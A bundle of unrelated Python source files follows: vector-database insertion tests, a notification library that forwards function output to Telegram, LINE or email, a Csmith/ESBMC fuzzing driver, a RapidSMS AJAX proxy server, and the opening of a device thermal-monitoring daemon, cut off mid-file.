target: test add vector to collection_1 after search collection_2 a while
method: search collection , sleep, and add vector
expected: status ok
'''
param = {'collection_name': gen_unique_str(),
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
status = connect.create_collection(param)
vector = gen_single_vector(dim)
status, ids = connect.add_vectors(ip_collection, vector)
assert status.OK()
time.sleep(add_interval_time)
status, result = connect.search_vectors(param['collection_name'], 1, vector)
assert status.OK()
"""
******************************************************************
The following cases are used to test `add_vectors` function
******************************************************************
"""
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
connect.flush([ip_collection])
assert len(ids) == nq
# check search result
status, result = connect.search_vectors(ip_collection, top_k, vectors)
logging.getLogger().info(result)
assert len(result) == nq
for i in range(nq):
assert result[i][0].id == i
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_ids_no_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use customize ids first, and then use no ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors, ids)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_twice_not_ids_ids(self, connect, ip_collection):
'''
target: check the result of add_vectors, with params ids and no ids
method: test add vectors twice, use not ids first, and then use customize ids
expected: status not OK
'''
nq = 5; top_k = 1
vectors = gen_vectors(nq, dim)
ids = [i for i in range(nq)]
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
status, ids = connect.add_vectors(ip_collection, vectors, ids)
logging.getLogger().info(status)
logging.getLogger().info(ids)
assert not status.OK()
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors_ids_length_not_match(self, connect, ip_collection):
'''
target: test add vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
ids = [i for i in range(1, nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.fixture(
scope="function",
params=gen_invalid_vector_ids()
)
def get_vector_id(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_ids_invalid(self, connect, ip_collection, get_vector_id):
'''
target: test add vectors in collection, use customize ids, which are not int64
method: create collection and add vectors in it
expected: raise an exception
'''
nq = 5
vectors = gen_vectors(nq, dim)
vector_id = get_vector_id
ids = [vector_id for i in range(nq)]
with pytest.raises(Exception) as e:
status, ids = connect.add_vectors(ip_collection, vectors, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_add_vectors(self, connect, ip_collection):
'''
target: test add vectors in collection created before
method: create collection and add vectors in it, check the ids returned and the collection length after vectors added
expected: the length of ids and the collection row count
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
assert status.OK()
assert len(ids) == nq
# @pytest.mark.level(2)
# def test_add_vectors_without_connect(self, dis_connect, ip_collection):
# '''
# target: test add vectors without connection
# method: create collection and add vectors in it, check if added successfully
# expected: raise exception
# '''
# nq = 5
# vectors = gen_vectors(nq, dim)
# with pytest.raises(Exception) as e:
# status, ids = dis_connect.add_vectors(ip_collection, vectors)
def test_add_vector_dim_not_matched(self, connect, ip_collection):
'''
target: test add vector, the vector dimension is not equal to the collection dimension
method: the vector dimension is half of the collection dimension, check the status
expected: status not ok
'''
vector = gen_single_vector(int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vector)
assert not status.OK()
def test_add_vectors_dim_not_matched(self, connect, ip_collection):
'''
target: test add vectors, the vector dimension is not equal to the collection dimension
method: the vectors dimension is half of the collection dimension, check the status
expected: status not ok
'''
nq = 5
vectors = gen_vectors(nq, int(dim)//2)
status, ids = connect.add_vectors(ip_collection, vectors)
assert not status.OK()
def test_add_vector_query_after_sleep(self, connect, ip_collection):
'''
target: test add vectors, and search it after sleep
method: set vector[0][1] as query vectors
expected: status ok and result length is 1
'''
nq = 5
vectors = gen_vectors(nq, dim)
status, ids = connect.add_vectors(ip_collection, vectors)
time.sleep(add_interval_time)
status, result = connect.search_vectors(ip_collection, 1, [vectors[0]])
assert status.OK()
assert len(result) == 1
def test_add_vector_multi_collections(self, connect):
'''
target: test add vectors is correct or not with multiple collections of IP
method: create 50 collections and add vectors into them in turn
expected: status ok
'''
nq = 100
vectors = gen_vectors(nq, dim)
collection_list = []
for i in range(20):
collection_name = gen_unique_str('test_add_vector_multi_collections')
collection_list.append(collection_name)
param = {'collection_name': collection_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_collection(param)
for j in range(10):
for i in range(20):
status, ids = connect.add_vectors(collection_name=collection_list[i], records=vectors)
assert status.OK()
class TestAddAdvance:
@pytest.fixture(
scope="function",
params=[
1,
1000,
6000
],
)
def insert_count(self, request):
yield request.param
def test_insert_much(self, connect, collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_ip(self, connect, ip_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
insert_vec_list = gen_vectors(nb, dim)
status, ids = connect.add_vectors(ip_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_jaccard(self, connect, jac_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(jac_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_hamming(self, connect, ham_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(ham_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
def test_insert_much_tanimoto(self, connect, tanimoto_collection, insert_count):
'''
target: test add vectors with different length of vectors
method: set different vectors as add method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
tmp, insert_vec_list = gen_binary_vectors(nb, dim)
status, ids = connect.add_vectors(tanimoto_collection, insert_vec_list)
assert len(ids) == nb
assert status.OK()
class TestNameInvalid(object):
"""
Test adding vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_collection_names()
)
def get_tag_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vectors_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors)
assert not status.OK()
@pytest.mark.level(2)
def test_add_vectors_with_invalid_tag_name(self, connect, get_collection_name, get_tag_name):
collection_name = get_collection_name
tag_name = get_tag_name
vectors = gen_vectors(1, dim)
status, result = connect.add_vectors(collection_name, vectors, partition_tag=tag_name)
assert not status.OK()
class TestAddCollectionVectorsInvalid(object):
single_vector = gen_single_vector(dim)
vectors = gen_vectors(2, dim)
"""
Test adding vectors with invalid vectors
"""
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def gen_vector(self, request):
yield request.param
@pytest.mark.level(2)
def test_add_vector_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_single_vector = copy.deepcopy(self.single_vector)
tmp_single_vector[0][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_single_vector)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors(self, connect, collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_jaccard(self, connect, jac_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(jac_collection, tmp_vectors)
@pytest.mark.level(2)
def test_add_vectors_with_invalid_vectors_hamming(self, connect, ham_collection, gen_vector):
tmp_vectors = copy.deepcopy(self.vectors)
tmp_vectors[1][1] = gen_vector
with pytest.raises(Exception) as e:
status, result = connect.add_vectors(ham_collection, tmp_vectors)
|
__init__.py
|
"""
doc string
"""
# pylint: disable=fixme
from email.header import Header
from email.mime.text import MIMEText
from datetime import datetime
import io
import json
import logging
import os
import re
import shutil
import smtplib
import sys
import time
import threading
import traceback
import queue
import requests
import yaml
VERSION = '0.9.5.1'
HINTED = False
def load_config(channel, conf_path='~/.busm.yaml'):
"""
doc string
"""
# pylint: disable=global-statement
global HINTED
conf_path = os.path.expanduser(conf_path)
if not os.path.isfile(conf_path):
tmpl_path = os.path.dirname(__file__) + '/conf/busm.yaml'
shutil.copy(tmpl_path, conf_path)
with open(conf_path, 'r', encoding='utf-8') as f_conf:
# TODO: 這裡很容易發生語法錯誤問題, 需要改善例外處理
conf = yaml.load(f_conf, Loader=yaml.SafeLoader)[channel]
if channel == 'smtp' and \
conf['from_email'] != 'someone@gmail.com':
return conf
if channel == 'telegram' and \
conf['token'] != '123456789:-----------------------------------':
return conf
if channel == 'line' and conf['token'] != '':
return conf
if not HINTED:
print('-' * 65)
print(' Please change busm config file (%s) to enable.' % conf_path)
print('-' * 65)
os.system('open -t %s' % conf_path) # TODO: Limit Darwin only.
HINTED = True
return None
def gl_pre_task(state):
"""
doc string
"""
state['conf'] = load_config(state['channel'])
if state['conf'] is not None:
state['begin'] = time.time()
sys.stdout = io.StringIO()
def gl_post_task(state):
"""
doc string
"""
if state['conf'] is not None:
# Print exc_info
if state['exc_val'] is not None:
print('')
typename = state['exc_type'].__name__
print('Found an exception "%s" (%s) at:' % (state['exc_val'], typename))
stack = traceback.extract_tb(state['exc_tb'])
stack.reverse()
indent_level = 1
for frm in stack:
if frm.filename.startswith(os.getcwd()):
filename = frm.filename[len(os.getcwd()) + 1:]
else:
filename = frm.filename
print(' ' * indent_level, end='')
print('%s (%s:%s)' % (frm.line, filename, frm.lineno))
indent_level += 1
# Retrive stdout.
state['stdout'] = sys.stdout.getvalue().strip()
sys.stdout.close()
sys.stdout = sys.__stdout__
# Retrive execution time.
state['elapsed'] = time.time() - state['begin']
# Default subject
if state['subject'] == '':
state['subject'] = '{}() executed.'.format(state['func'].__name__)
# Send to target channel
if state['channel'] == 'telegram':
telegram_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed']
)
elif state['channel'] == 'line':
line_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed']
)
elif state['channel'] == 'smtp':
smtp_send_message(
state['conf'], state['subject'],
state['stdout'], state['elapsed'], state['debug']
)
def telegram_send_message(conf, subject, detail, extime=-1):
"""
doc string
"""
# pylint: disable=bare-except
if extime == -1:
message = '*{}*\n```\n{}\n```'.format(subject, detail)
else:
message = '*{}* ({:.2f}s)\n```\n{}\n```'.format(subject, extime, detail)
api = 'https://api.telegram.org/bot{}/sendMessage'.format(conf['token'])
params = {
'chat_id': conf['master'],
'text': message,
'parse_mode': 'markdown',
'disable_web_page_preview': False
}
sent = False
retry = -1
while not sent and retry < 3:
try:
retry += 1
resp = requests.post(api, data=params)
if resp.headers['Content-Type'] == 'application/json':
result = resp.json()
if result['ok']:
sent = True
else:
# TODO: handling for Telegram API responsed
# print(result['description'])
break
except:
# TODO: handling for Telegram API not responsed
pass
def line_send_message(conf, subject, detail, extime=-1):
"""
doc string
"""
if extime == -1:
message = '*{}*\n```{}```'.format(subject, detail)
else:
message = '*{}* ({:.2f}s)\n```{}```'.format(subject, extime, detail)
api = 'https://notify-api.line.me/api/notify'
params = {
'message': message
}
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Bearer {}'.format(conf['token'])
}
sent = False
retry = -1
while not sent and retry < 3:
resp = requests.post(api, data=params, headers=headers)
if resp.status_code != 200:
retry += 1
else:
sent = True
def smtp_send_message(conf, subject, detail, extime=-1, debug=False):
"""
doc string
"""
# Compose email
if extime == -1:
contents = re.sub(r'\s+\| ', '\n', '''
| <p>STDOUT:</p>
| <pre style="border:1px solid #aaa; border-radius:5px; background:#e7e7e7; padding:10px;">
| {}
| </pre>
| <p style="color: #d0d0d0;">Sent by busm {}</p>
''') \
.format(detail, VERSION)
else:
contents = re.sub(r'\s+\| ', '\n', '''
| <p>STDOUT:</p>
| <pre style="border:1px solid #aaa; border-radius:5px; background:#e7e7e7; padding:10px;">
| {}
| </pre>
| <ul style="padding: 5px">
| <li>Execution time: {:.2f}</li>
| </ul>
| <p style="color: #d0d0d0;">Sent by busm {}</p>
''') \
.format(detail, extime, VERSION)
msg = MIMEText(contents, 'html', 'utf-8')
msg['Subject'] = Header(subject)
msg['From'] = '{} <{}>'.format(Header(conf['from_name']).encode(), conf['from_email'])
msg['To'] = '{} <{}>'.format(Header(conf['to_name']).encode(), conf['to_email'])
smtp_message = msg.as_string()
# Send email
# pylint: disable=broad-except, singleton-comparison
try:
with smtplib.SMTP(conf['host'], conf['port'], timeout=30) as smtp:
if debug == True:
smtp.set_debuglevel(2)
smtp.starttls()
smtp.login(conf['user'], conf['pass'])
smtp.sendmail(conf['from_email'], conf['to_email'], smtp_message)
except Exception as ex:
print('Failed to send email.')
print(ex)
def through_smtp(func=None, subject='', debug=False):
"""
@busm.through_smtp
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'debug': debug,
'channel': 'smtp',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_smtp
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_smtp(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
def through_telegram(func=None, subject=''):
"""
@busm.through_telegram
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'channel': 'telegram',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_telegram
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_telegram(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
def through_line(func=None, subject=''):
"""
@busm.through_line
"""
state = {
'begin': 0,
'conf': None,
'func': None,
'subject': subject,
'channel': 'line',
'exc_type': None,
'exc_val': None,
'exc_tb': None
}
# @busm.through_line
def func_wrapper(*args):
# pylint: disable=not-callable, broad-except
nonlocal state
gl_pre_task(state)
try:
fret = state['func'](*args)
except Exception:
state['exc_type'], state['exc_val'], state['exc_tb'] = sys.exc_info()
fret = None
gl_post_task(state)
return fret
# @busm.through_line(subject='...')
def deco_wrapper(func):
nonlocal state
state['func'] = func
return func_wrapper
if callable(func):
state['func'] = func
return func_wrapper
return deco_wrapper
class BusmHandler(logging.Handler):
"""
doc string
"""
# pylint: disable=too-many-instance-attributes
def __init__(self, channel='telegram', subject='', config=''):
super().__init__()
if config != '':
self.conf = load_config(channel, conf_path=config)
else:
self.conf = {}
self.channel = channel
self.subject = subject
self.queue = queue.Queue()
self.has_sender = False
def setup_telegram(self, token, master):
"""
setup token and master for telegram channel
"""
self.channel = 'telegram'
self.conf['token'] = token
self.conf['master'] = master
def setup_line(self, token):
"""
setup token for line channel
"""
self.channel = 'line'
self.conf['token'] = token
def emit(self, record):
pass
def handle(self, record):
if record.getMessage() == '$':
message = '$'
else:
message = self.format(record)
# TODO: Improve thread-safe
# TODO: If conf was empty, messages would cause OOM.
# Maybe a limit of queue size is necessary.
self.queue.put(message)
if not self.has_sender and self.conf != {}:
self.has_sender = True
threading.Thread(target=self.sender).start()
def sender(self):
"""
thread target to dequeue and send message
"""
begin = 0
collected = []
while self.queue.qsize() > 0 or collected:
while self.queue.qsize() > 0:
message = self.queue.get()
if message != '$':
if not collected:
begin = time.time()
collected.append(message)
else:
break
if collected:
duration = time.time() - begin
if duration > 1 or message == '$':
self.send('\n'.join(collected))
collected.clear()
self.has_sender = False
def send(self, buffered_message):
"""
send buffered message
"""
if self.channel == 'telegram':
telegram_send_message(self.conf, self.subject, buffered_message)
elif self.channel == 'line':
line_send_message(self.conf, self.subject, buffered_message)
|
run_csmith.py
|
#!/usr/bin/env python3
import os.path
import sys
import subprocess
import tempfile
from multiprocessing import Process
import time
import shutil
class Csmith:
"""Wrapper for Csmith"""
def __init__(self, csmith: str, csmith_inc: str, csmith_args=""):
if not os.path.exists(csmith):
raise ValueError(f'{csmith} does not exist!')
if not os.path.exists(os.path.join(csmith_inc, "csmith.h")):
raise ValueError(f'{csmith_inc} does not contain csmith.h!')
self.csmith = csmith
self.csmith_inc = csmith_inc
self.csmith_args = csmith_args
def generate_c_file(self, output):
"""Run csmith using `args` and saving in `output`"""
cmd = f'{self.csmith} {self.csmith_args}'
cmd_out = subprocess.check_output(cmd.split()).decode()
with open(output, 'w') as f:
f.write(cmd_out)
class ESBMC:
"""Wrapper for ESBMC"""
def __init__(self, esbmc: str, esbmc_args=""):
if not os.path.exists(esbmc):
raise ValueError(f'{esbmc} does not exist!')
self.esbmc = esbmc
self.esbmc_args = esbmc_args
def run(self, csmith_inc, csmith_file="", timeout=10) -> int:
"""Run esbmc with `args` and return exit code"""
cmd = f'{self.esbmc} -I{csmith_inc} {csmith_file} {self.esbmc_args}'
try:
print("Running " + cmd)
ps = subprocess.run(cmd.split(), timeout=int(timeout), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
print(ps)
return ps.returncode
except Exception as exception:
print(exception.__class__.__name__) # Expect to see Timedout
return 0
class Driver:
"""Main driver"""
def __init__(self, csmith: Csmith, esbmc: ESBMC, esbmc_timeout=10):
self.csmith = csmith
self.esbmc = esbmc
self.esbmc_timeout = esbmc_timeout
def _main(self):
if not os.path.exists('csmith-tests/'):
os.makedirs('csmith-tests')
counter = 0
while True:
counter = counter + 1
c_file = "csmith-tests/" + str(counter) + ".c"
# 1. Generate C file
self.csmith.generate_c_file(c_file)
# 2. Run ESBMC
res = self.esbmc.run(self.csmith.csmith_inc, c_file, self.esbmc_timeout)
# Check if an error was found
# FUTURE: For max-coverage we probably just have to remove this 'if'
if res != 0:
print("Found Error!")
if not os.path.exists('csmith-error/'):
os.makedirs('csmith-error')
shutil.copyfile(c_file, "csmith-error/error.c")
shutil.copyfile(os.path.join(self.csmith.csmith_inc, "csmith.h"), "csmith-error/csmith.h")
with open("csmith-error/desc") as f:
f.write(self.esbmc.esbmc_args)
f.write(res)
return
def run(self, timeout=100):
"""Start driver with defined timeout"""
ps = Process(target=self._main)
ps.start()
ps.join(timeout=int(timeout))
ps.terminate()
def main():
print("Running csmith over esbmc...")
csmith = sys.argv[1]
csmith_inc = sys.argv[2]
csmith_args = sys.argv[3]
esbmc = sys.argv[4]
esbmc_args = sys.argv[5]
esbmc_timeout = sys.argv[6]
driver_timeout = sys.argv[7]
csmith_obj = Csmith(csmith, csmith_inc, csmith_args)
esbmc_obj = ESBMC(esbmc, esbmc_args)
driver = Driver(csmith_obj, esbmc_obj, esbmc_timeout)
driver.run(driver_timeout)
print("Done")
if __name__ == "__main__":
main()
|
app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import cgi
import urlparse
import traceback
from threading import Thread
from SocketServer import ThreadingMixIn
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from django.utils.simplejson import JSONEncoder
from django.db.models.query import QuerySet
from rapidsms.apps.base import AppBase
from rapidsms.conf import settings
class App(AppBase):
"""
This App does nothing by itself. It exists only to serve other Apps,
by providing an easy (and standard) way for them to communicate
between their WebUI and RapidSMS App object.
When RapidSMS starts, this app starts an HTTPServer (port 8001 as
default, but configurable via settings.py) in a worker thread, and
watches for any incoming HTTP requests matching */app/method*. These
requests, along with their GET parameters and POST data, are passed
on to the named app.
Examples::
method URL app method args
====== === === ====== ====
GET /food/toast food ajax_GET_toast { }
POST /food/waffles food ajax_POST_waffles { }, { }
POST /food/eggs?x=1 food ajax_POST_eggs { "x": [1] }, { }
Any data that is returned by the handler method is JSON encoded, and
sent back to the WebUI in response. Since RapidSMS includes jQuery
with every view, this makes it very easy for apps to query their
running App object for state. See the _httptester_ for an example.
But wait! AJAX can't cross domains, so a request to port 8001 from
the WebUI won't work! This is handled by the WebUI bundled with this
app, that proxies all requests to /ajax/(.+) to the right place, on
the server side. I cannot conceive of a situation where this would
be a problem - but keep it in mind, and don't forget to prepend
"/ajax/" to your AJAX URLs.
"""
class Server(ThreadingMixIn, HTTPServer):
pass
class MyJsonEncoder(JSONEncoder):
def default(self, o):
# if this object has its own JSON serializer, use it
if hasattr(o, "__json__"):
return o.__json__()
elif type(o) == QuerySet:
return list(o)
# otherwise, revert to the usual behavior
return JSONEncoder.default(self, o)
class RequestHandler(BaseHTTPRequestHandler):
def _find_app(self, name):
for app in self.server.app.router.apps:
if app.name == name:
return app
def _charset(self, str):
"""
Extract and return the charset argument from an HTTP
content-type header, or None if it was not found.
"""
x = str.split("charset=", 1)
return x[1] if(len(x) == 2) else None
# handle GET and POST with the same method
def do_GET(self): return self.process()
def do_POST(self): return self.process()
def process(self):
def response(code, output, json=True):
self.send_response(code)
mime_type = "application/json" if json else "text/plain"
self.send_header("content-type", mime_type)
self.end_headers()
if json:
json = App.MyJsonEncoder().encode(output)
self.wfile.write(json)
# otherwise, write the raw response. it doesn't make
# much sense to have error messages encoded as JSON.
else: self.wfile.write(output)
# HTTP2xx represents success
return (code>=200 and code <=299)
# should look something like:
# /alpha/bravo?charlie=delta
#
# this request will be parsed to the "bravo"
# method of the "alpha" app, with the params:
# { "charlie": ["delta"] }
#
# any other path format will return an http 404 error, for
# the time being. GET parameters are optional.
url = urlparse.urlparse(self.path)
path_parts = url.path.split("/")
# abort if the url didn't look right
if len(path_parts) != 3:
str_ = "Malformed URL: %s" % url
self.server.app.warning(str_)
return response(404, str_)
# resolve the first part of the url into an app (via the
# router), and abort if it wasn't valid
app_name = path_parts[1]
app = self._find_app(app_name)
if (app is None):
str_ = "Invalid app: %s" % app_name
self.server.app.warning(str_)
return response(404, str_)
# same for the request name within the app
meth_name = "ajax_%s_%s" % (self.command, path_parts[2])
if not hasattr(app, meth_name):
str_ = "Invalid method: %s.%s" %\
(app.__class__.__name__, meth_name)
self.server.app.warning(str_)
return response(404, str_)
# everything appears to be well, so call the target method,
# and return the response (as a string, for now)
try:
method = getattr(app, meth_name)
args = [cgi.parse_qs(url.query)]
# for post requests, we'll also need to parse the form
# data and hand it along to the method
if self.command == "POST":
content_type = self.headers["content-type"]
form = {}
# parse the form data via the CGI lib. this is a
# horrible mess, but supports all kinds of encodings
# that we may encounter. (multipart, in particular.)
storage = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ = {
"REQUEST_METHOD": "POST",
"CONTENT_TYPE": content_type })
# extract the charset from the content-type header,
# which should have been passed along in views.py
charset = self._charset(content_type)
# convert the fieldstorage object into a dict, to
# keep it simple for the handler methods. TODO: make
# this a util, if it's useful elsewhere.
for key in storage.keys():
# convert each of the values with this key into
# unicode, respecting the content-type that the
# request _claims_ to be currently encoded with
val = [
unicode(v, charset)
for v in storage.getlist(key)]
# where possible, store the values as singular,
# to avoid CGI's usual post["id"][0] verbosity
form[key] = val[0] if(len(val) == 1) else val
args.append(form)
self.server.app.debug(
"Calling %s.%s with args: %s" %
(app.__class__.__name__, meth_name, args))
output = method(*args)
self.server.app.debug("Response: %s" % output)
return response(200, output)
# something raised during the request, so return a useless
# http error to the requester
except Exception, err:
self.server.app.warning(traceback.format_exc())
return response(500, unicode(err), False)
# this does nothing, except prevent the incoming http requests
# from being echoed to the screen (which screws up the log)
def log_request(*args):
pass
def start(self):
# create the webserver, through which the AJAX requests from the
# WebUI will arrive (via utils.py)
self.server = self.Server((
settings.AJAX_PROXY_HOST,
settings.AJAX_PROXY_PORT),
self.RequestHandler)
# allow the server to call back the app
self.server.app = self
# start the server in a separate thread, and daemonize it to
# prevent it from hanging once the main thread terminates
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.kegman_kans_conf import kegman_kans_conf
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5 if TICI else 70.0
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
# from bellow line, to control charging disabled
def check_car_battery_voltage(should_start, pandaStates, charging_disabled, msg):
sm = messaging.SubMaster(["pandaStates"])
sm.update(0)
pandaStates = sm['pandaStates']
if sm.updated['pandaStates']:
print(pandaStates)
kegman_kans = kegman_kans_conf()
if charging_disabled and (pandaStates is None) and msg.deviceState.batteryPercent < int(kegman_kans.conf['battChargeMin']):
charging_disabled = False
os.system('echo "1" > /sys/class/power_supply/battery/charging_enabled')
elif (charging_disabled or not charging_disabled) and (msg.deviceState.batteryPercent < int(kegman_kans.conf['battChargeMax']) or (pandaStates is None and not should_start)):
charging_disabled = False
os.system('echo "1" > /sys/class/power_supply/battery/charging_enabled')
elif not charging_disabled and (msg.deviceState.batteryPercent > int(kegman_kans.conf['battChargeMax']) or (pandaStates is not None and not should_start)):
charging_disabled = True
os.system('echo "0" > /sys/class/power_supply/battery/charging_enabled')
elif msg.deviceState.batteryCurrent < 0 and msg.deviceState.batteryPercent > int(kegman_kans.conf['battChargeMax']):
charging_disabled = True
os.system('echo "0" > /sys/class/power_supply/battery/charging_enabled')
return charging_disabled # to this line
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
